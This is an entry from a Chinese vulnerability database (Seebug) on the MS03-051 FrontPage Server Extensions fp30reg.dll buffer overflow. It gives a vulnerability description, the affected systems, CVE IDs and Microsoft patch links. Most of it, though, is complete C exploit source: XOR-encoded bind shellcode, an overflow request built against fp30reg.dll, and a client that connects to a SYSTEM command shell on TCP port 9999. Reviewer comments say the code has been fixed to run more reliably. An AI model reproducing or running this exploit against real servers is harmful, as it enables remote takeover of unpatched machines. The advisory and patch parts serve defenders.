MS Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)

2003-11-13T00:00:00
ID SSV:13803
Type seebug
Reporter Root
Modified 2003-11-13T00:00:00

Description

<p><strong>漏洞描述:</strong></p><p>Microsoft FrontPage服务器扩展是Microsoft公司开发的用于加强IIS Web服务器的功能的软件包。Microsoft FrontPage Server Extensions存在两个安全漏洞,远程攻击者可以利用这些漏洞进行缓冲区溢出攻击,可能以FrontPage进程权限在系统上执行任意指令。 第一个漏洞是由于FrontPage服务扩展的远程调试功能上存在缓冲区溢出,这个功能用于用户远程连接FrontPage服务扩展的服务器和远程调试内容使用,如Visual Interdev。攻击者成功利用这个漏洞可以以本地SYSTEM权限在系统上执行任意指令,然后在系统上执行任意操作,如安装程序,查看更改或删除数据,建立拥有全部权限的帐户等。 第二个漏洞存在于SmartHTML解析器中,该解析器提供对WEB表单和其他基于FrontPage动态内容的支持,攻击者利用这个漏洞可以使运行FrontPage服务扩展的服务器临时停止对正常请求的响应。 下文的利用程序针对第一个漏洞(fp30reg.dll),仅在Windows 2000 Professional SP3英文版、fp30reg.dll 4.0.2.5526上测试过;成功后会在目标的TCP 9999端口绑定一个命令shell,防火墙或主机过滤会阻止随后的回连。</p><p><strong>漏洞影响:</strong></p><p>受影响的系统:</p><p> •Microsoft Windows 2000 Service Pack 2, Service Pack 3</p><p>•Microsoft Windows XP, Microsoft Windows XP Service Pack 1</p><p>•Microsoft Windows XP 64-Bit Edition, Microsoft Windows XP 64-Bit Edition Service Pack 1</p><p>•Microsoft Office XP, Microsoft Office XP Service Pack 1, Service Pack 2</p><p>•Microsoft Office 2000 Server Extensions</p><p>不受影响的系统: </p><p>•Microsoft Windows Millennium Edition </p><p>•Microsoft Windows NT Workstation 4.0, Service Pack 6a </p><p>•Microsoft Windows NT Server 4.0, Service Pack 6a </p><p>•Microsoft Windows NT Server 4.0, Terminal Server Edition, Service Pack 6 </p><p>•Microsoft Windows 2000 Service Pack 4 </p><p>•Microsoft Windows XP 64-Bit Edition Version 2003 </p><p>•Microsoft Windows Server 2003 (Windows SharePoint Services) </p><p>•Microsoft Windows Server 2003 64-Bit Edition (Windows SharePoint Services)</p><p>•Microsoft Office System 2003 </p><p>Affected Components: </p><p>•Microsoft FrontPage Server Extensions 2000 (For Windows NT4) and Microsoft Office 2000 Server Extensions (Shipped with Office 2000)</p><p>•Microsoft FrontPage Server Extensions 2000 (Shipped with Windows 2000)</p><p>•Microsoft FrontPage Server Extensions 2000 (Shipped with Windows XP) </p><p>•Microsoft FrontPage Server Extensions 2000 64-bit (Shipped with Windows XP 64-bit)</p><p>•Microsoft FrontPage Server Extensions 2002 </p><p>•Microsoft SharePoint Team Services 2002 (Shipped with Office XP)</p><p><strong>CVE-ID:CVE-2003-0822,CVE-2003-0824 
</strong></p><p><strong>CNNVD-ID:CNNVD-200312-061,CNNVD-200312-053</strong></p><p><strong>CNVD-ID:CNVD-2003-3292</strong> </p><p><strong></strong> </p><p><strong>解决方案:</strong></p><p>Microsoft </p><p>--------- </p><p>Microsoft已经为此发布了一个安全公告(MS03-051)以及相应补丁:</p><p>MS03-051:Buffer Overrun in Microsoft FrontPage Server Extensions Could Allow Code Execution (813360)链接:<a href="http://www.microsoft.com/technet/security/bulletin/MS03-051.asp">http://www.microsoft.com/technet/security/bulletin/MS03-051.asp</a></p><p>补丁下载:Microsoft FrontPage Server Extensions 2000 <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=C84C3D10-A821-4819-BF58-D3BC70A77BFA&displaylang=en">http://www.microsoft.com/downloads/details.aspx?FamilyId=C84C3D10-A821-4819-BF58-D3BC70A77BFA&displaylang=en</a> </p><p>Microsoft FrontPage Server Extensions 2000 (Shipped with Windows 2000) <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=057D5F0E-0E2B-47D2-9F0F-3B15DD8622A2&displaylang=en">http://www.microsoft.com/downloads/details.aspx?FamilyId=057D5F0E-0E2B-47D2-9F0F-3B15DD8622A2&displaylang=en</a> </p><p>Microsoft FrontPage Server Extensions 2000 (Shipped with Windows XP) <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=9B302532-BFAB-489B-82DC-ED1E49A16E1C&displaylang=en">http://www.microsoft.com/downloads/details.aspx?FamilyId=9B302532-BFAB-489B-82DC-ED1E49A16E1C&displaylang=en</a> </p><p>Microsoft FrontPage Server Extensions 2002 <a href="http://www.microsoft.com/downloads/details.aspx?FamilyId=3E8A21D9-708E-4E69-8299-86C49321EE25&displaylang=en">http://www.microsoft.com/downloads/details.aspx?FamilyId=3E8A21D9-708E-4E69-8299-86C49321EE25&displaylang=en</a> </p><p>Microsoft SharePoint Team Services 2002 (shipped with Office XP) <a 
href="http://www.microsoft.com/downloads/details.aspx?FamilyId=5923FC2F-D786-4E32-8F15-36A1C9E0A340&displaylang=en">http://www.microsoft.com/downloads/details.aspx?FamilyId=5923FC2F-D786-4E32-8F15-36A1C9E0A340&displaylang=en</a></p>

                                        
                                            
                                                /*******************************************************************************

Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore

Exploit by Adik netmaniac hotmail kg

Binds persistent command shell on port 9999
Tested on 			
		Windows 2000 Professional SP3 English version 
		(fp30reg.dll ver 4.0.2.5526)			

-[ 13/Nov/2003 ]-
********************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

#define VER		&quot;0.1&quot;	

/******** bind shellcode spawns persistent shell on port 9999 *****************************/
/* 484 bytes, sent verbatim inside the overflow buffer built in main().
 * The first 27 bytes are a self-locating decoder (jmp/call/pop to obtain its
 * own address, then `xor byte [eax], 0x88` / inc / loop over the following
 * 0x1C9 = 457 bytes); everything after offset 27 is the XOR-0x88-encoded
 * payload. The encoding is what keeps 0x00 out of the buffer, which matters
 * because main() copies the buffer with a %s format.
 * NOTE(review): the listening port (9999 per the header) is presumably inside
 * the encoded bytes; changing it means re-encoding the payload, not editing
 * main(). The bytes below are left exactly as published. */
unsigned char kyrgyz_bind_code[] = {
	0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
	0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
	0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 
	0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 
	0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 
	0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 
	0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 
	0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 
	0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 
	0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 
	0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 
	0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 
	0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 
	0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 
	0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 
	0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 
	0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 
	0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 
	0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 
	0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 
	0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 
	0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 
	0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 
	0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};

/* Relay loop between local stdin/stdout and the shell reachable through the
 * connected socket `sock`; returns once either side closes. */
void cmdshell (int sock);
/* Resolve a dotted-quad string or a hostname to an IPv4 address in network
 * byte order. Does not return on failure: prints an error and exits. */
long gimmeip(char *hostname);

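/*
 * Entry point: build the fp30reg.dll overflow request, send it to
 * argv[1]:<port> (default 80), wait for the bind shell to come up and then
 * connect to it on TCP 9999 and hand the socket to cmdshell().
 *
 * Returns 0 after the shell session ends, 1 on any usage/network error.
 * Fixes relative to the published version: the request is no longer built
 * with sprintf() reading and writing the same buffer (undefined behaviour),
 * the hostname can no longer overflow the 3000-byte packet, the port is
 * validated, a short or empty reply no longer reads stale bytes, and every
 * error path closes its socket.
 */
int main(int argc, char *argv[])
{
	WSADATA wsaData;
	struct sockaddr_in targetTCP;
	SOCKET sockTCP;
	int s, len, got;
	unsigned short port = 80;
	long ip;
	size_t dlen;
	const char header[] = "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
	char packet[3000];
	unsigned char data[1500];
	/* Overwrite values are specific to fp30reg.dll 4.0.2.5526 on Windows 2000
	 * SP3 (see the file header); other builds place .data elsewhere. */
	const unsigned char ecx[] = "\xe0\xf3\xd4\x67";
	const unsigned char edi[] = "\xff\xd0\x90\x90";
	const unsigned char call[] = "\xe4\xf3\xd4\x67";	/* overwrite .data section of fp30reg.dll */
	const unsigned char shortjmp[] = "\xeb\x10";

	printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"
	       " by Adik < netmaniac [at] hotmail.KG >\n\n", VER);
	if (argc < 2) {
		printf(" Usage: %s [Target] <port>\n"
		       " eg: fp30reg.exe 192.168.63.130\n\n", argv[0]);
		return 1;
	}
	if (argc == 3) {
		/* strtol instead of atoi: reject junk and out-of-range ports instead of
		 * silently connecting to port 0. */
		char *end = NULL;
		long p = strtol(argv[2], &end, 10);
		if (end == argv[2] || *end != '\0' || p < 1 || p > 65535) {
			printf("[x] Invalid port '%s'! Exiting...\n", argv[2]);
			return 1;
		}
		port = (unsigned short)p;
	}
	if (WSAStartup(0x0202, &wsaData) != 0) {
		printf("[x] WSAStartup failed! Exiting...\n");
		return 1;
	}
	printf("[*] Target:\t%s \tPort: %d\n\n", argv[1], port);
	ip = gimmeip(argv[1]);	/* exits the process if the name does not resolve */
	memset(&targetTCP, 0, sizeof(targetTCP));
	targetTCP.sin_family = AF_INET;
	targetTCP.sin_addr.s_addr = ip;
	targetTCP.sin_port = htons(port);

	/* Overflow buffer: a NOP sled carrying the register overwrites at fixed
	 * offsets, a short jump over the overwritten pointer, then the shellcode.
	 * The buffer is later copied with %s, so nothing placed here may be 0x00. */
	memset(data, 0x90, sizeof(data) - 1);
	data[sizeof(data) - 1] = '\0';
	memcpy(&data[16], edi, sizeof(edi) - 1);
	memcpy(&data[20], ecx, sizeof(ecx) - 1);
	memcpy(&data[250 + 10], shortjmp, sizeof(shortjmp) - 1);
	memcpy(&data[250 + 14], call, sizeof(call) - 1);
	if (250 + 70 + sizeof(kyrgyz_bind_code) > sizeof(data) - 1) {
		printf("[x] Shellcode does not fit in the overflow buffer! Exiting...\n");
		WSACleanup();
		return 1;
	}
	memcpy(&data[250 + 70], kyrgyz_bind_code, sizeof(kyrgyz_bind_code));
	dlen = strlen((char *)data);

	/* One bounded snprintf builds the whole request. As published, the body is
	 * sent as a single chunk while a Content-Length header is also present. */
	len = snprintf(packet, sizeof(packet),
	               "%sHost: %s\r\nTransfer-Encoding: chunked\r\n"
	               "Content-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",
	               header, argv[1], (int)dlen, (unsigned)dlen, (char *)data);
	if (len < 0 || (size_t)len >= sizeof(packet)) {
		printf("[x] Request does not fit in the packet buffer (hostname too long?)! Exiting...\n");
		WSACleanup();
		return 1;
	}

	sockTCP = socket(AF_INET, SOCK_STREAM, 0);
	if (sockTCP == INVALID_SOCKET) {
		printf("[x] Socket not initialized! Exiting...\n");
		WSACleanup();
		return 1;
	}
	printf("[*] Socket initialized...\n");
	if (connect(sockTCP, (struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0) {
		printf("[*] Connection to host failed! Exiting...\n");
		closesocket(sockTCP);
		WSACleanup();
		return 1;
	}
	printf("[*] Checking for presence of fp30reg.dll...");
	if (send(sockTCP, packet, len, 0) != len) {
		printf("[x] Failed to inject packet! Exiting...\n");
		closesocket(sockTCP);
		WSACleanup();
		return 1;
	}
	/* Presence test: the reply's status code (bytes 9..11 of "HTTP/1.x NNN")
	 * must be 100. A closed connection or a reply shorter than that is a miss. */
	memset(packet, 0, sizeof(packet));
	got = recv(sockTCP, packet, (int)sizeof(packet) - 1, 0);
	if (got <= 0) {
		printf("[x] Failed to receive packet! Exiting...\n");
		closesocket(sockTCP);
		WSACleanup();
		return 1;
	}
	if (got >= 12 && packet[9] == '1' && packet[10] == '0' && packet[11] == '0') {
		printf(" Found!\n");
	} else {
		printf(" Not Found!! Exiting...\n");
		closesocket(sockTCP);
		WSACleanup();
		return 1;
	}
	printf("[*] Packet injected!\n");
	closesocket(sockTCP);

	/* Give the shellcode time to decode and bind before connecting back. */
	printf("[*] Sleeping ");
	for (s = 0; s < 13000; s += 1000) {
		printf(". ");
		fflush(stdout);
		Sleep(1000);
	}

	printf("\n[*] Connecting to host: %s on port 9999", argv[1]);
	sockTCP = socket(AF_INET, SOCK_STREAM, 0);
	if (sockTCP == INVALID_SOCKET) {
		printf("\n[x] Socket not initialized! Exiting...\n");
		WSACleanup();
		return 1;
	}
	targetTCP.sin_port = htons(9999);	/* family and address are unchanged */
	if (connect(sockTCP, (struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0) {
		printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n");
		closesocket(sockTCP);
		WSACleanup();
		return 1;
	}
	printf("\n[*] Dropping to shell...\n\n");
	/* cmdshell() owns the socket from here and tears down Winsock on return.
	 * The int cast mirrors its prototype; socket handles fit in an int. */
	cmdshell((int)sockTCP);
	return 0;
}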
/*********************************************************************************/
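/*
 * Relay between the local console and the shell reachable through `sock`.
 *
 * Each iteration waits up to one second for data from the shell and prints
 * it; when nothing arrives it reads one line from stdin and sends it. The
 * function returns (after closing the socket and tearing down Winsock) when
 * the remote end closes, a socket call fails, or stdin reaches EOF.
 *
 * Fixes relative to the published version: select() gets a real fd_set
 * (the original aliased a two-element unsigned long array as one) and a
 * select() error is treated as a closed connection instead of falling into
 * the stdin branch; the timeout is re-armed every round.
 */
void cmdshell (int sock)
{
	SOCKET fd = (SOCKET)sock;
	struct timeval tv;
	fd_set readfds;
	int rc, length;
	char buffer[1000];

	for (;;) {
		/* select() rewrites both the set and, on some stacks, the timeout. */
		FD_ZERO(&readfds);
		FD_SET(fd, &readfds);
		tv.tv_sec = 1;
		tv.tv_usec = 0;

		rc = select(0, &readfds, NULL, NULL, &tv);
		if (rc == SOCKET_ERROR) {
			printf("[x] Connection closed.\n");
			closesocket(fd);
			WSACleanup();
			return;
		}
		if (rc == 1) {
			/* Shell output pending: recv() of 0 means the peer closed. */
			length = recv(fd, buffer, sizeof(buffer), 0);
			if (length <= 0) {
				printf("[x] Connection closed.\n");
				closesocket(fd);
				WSACleanup();
				return;
			}
			if (fwrite(buffer, 1, (size_t)length, stdout) != (size_t)length) {
				printf("[x] Connection closed.\n");
				closesocket(fd);
				WSACleanup();
				return;
			}
			fflush(stdout);
		} else {
			/* Nothing from the shell for a second: block on one line of local
			 * input. Output arriving meanwhile is shown after the next send. */
			if (fgets(buffer, sizeof(buffer), stdin) == NULL) {
				printf("[x] Connection closed.\n");
				closesocket(fd);
				WSACleanup();
				return;
			}
			length = (int)strlen(buffer);
			if (send(fd, buffer, length, 0) <= 0) {
				printf("[x] Connection closed.\n");
				closesocket(fd);
				WSACleanup();
				return;
			}
		}
	}
}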
/*********************************************************************************/
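/*
 * Resolve `hostname` (dotted quad or DNS name) to an IPv4 address in network
 * byte order, returned as a long for direct assignment to sin_addr.s_addr.
 *
 * Does not return on failure: prints an error, calls WSACleanup() and exits
 * with status 1, as the published version did.
 *
 * Fixes relative to the published version: inet_addr() reports failure as
 * INADDR_NONE (0xFFFFFFFF), which the original only caught via `< 0` because
 * long is 32 bits on Windows; and the copy out of the hostent is bounded to
 * an IPv4 address instead of trusting h_length. A literal 255.255.255.255 is
 * indistinguishable from failure and falls through to the DNS lookup.
 */
long gimmeip(char *hostname)
{
	struct hostent *he;
	unsigned long ipaddr = 0;	/* zeroed so a 4-byte copy below is fully defined */

	ipaddr = inet_addr(hostname);
	if (ipaddr == INADDR_NONE) {
		he = gethostbyname(hostname);
		if (he == NULL || he->h_addrtype != AF_INET ||
		    he->h_length != (int)sizeof(struct in_addr) ||
		    he->h_addr_list[0] == NULL) {
			printf("[x] Failed to resolve host: %s! Exiting...\n\n", hostname);
			WSACleanup();
			exit(1);
		}
		memcpy(&ipaddr, he->h_addr_list[0], sizeof(struct in_addr));
	}
	return (long)ipaddr;
}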
/*********************************************************************************/
